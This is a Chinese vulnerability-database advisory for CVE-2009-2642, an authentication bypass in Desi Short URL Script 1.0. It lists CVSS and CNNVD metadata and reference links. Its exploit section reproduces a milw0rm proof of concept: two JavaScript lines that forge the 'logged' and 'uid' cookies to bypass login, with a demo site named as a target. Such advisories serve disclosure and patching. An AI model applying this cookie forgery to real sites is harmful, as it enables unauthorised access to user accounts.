Desi Short URL Script身份认证绕过漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117938 漏洞类型 授权问题
发布时间 2009-06-10 更新时间 2009-06-10
CVE编号 CVE-2009-2642 CNNVD-ID CNNVD-200907-403
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/8925
https://www.securityfocus.com/bid/44415
https://cxsecurity.com/issue/WLB-2009070056
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200907-403
|漏洞详情
DesiShortURLScript脚本index.php存在身份认证绕过漏洞。远程攻击者通过把登陆过的cookie设置成1,以及把uidcookie设置成一个整数值来绕过身份验证,比如设置成13。
|漏洞EXP
Desi Short URL  Insecure Cookie Handling Vulnerability
Discovered By:N@bilX
Home:ma-exploit.com /m4r0c-s3curity.cc
email:eyx@hotmail.com
Not: jib L3az Wla Khaz [ma]
--------------------
download:http://webscripts.softpedia.com/script/Miscellaneous/Desi-Short-Url-Script-42484.html
exploit:
***
javascript:document.cookie = "logged =1";
javascript:document.cookie = "uid = 13";
-----------------
demo:http://www.desiscripts.com/demo/URL/index.php

# milw0rm.com [2009-06-10]
|受影响的产品
Desi Scripts Desi Short URL Script 1.0
|参考资料

来源:MILW0RM
名称:8925
链接:http://www.milw0rm.com/exploits/8925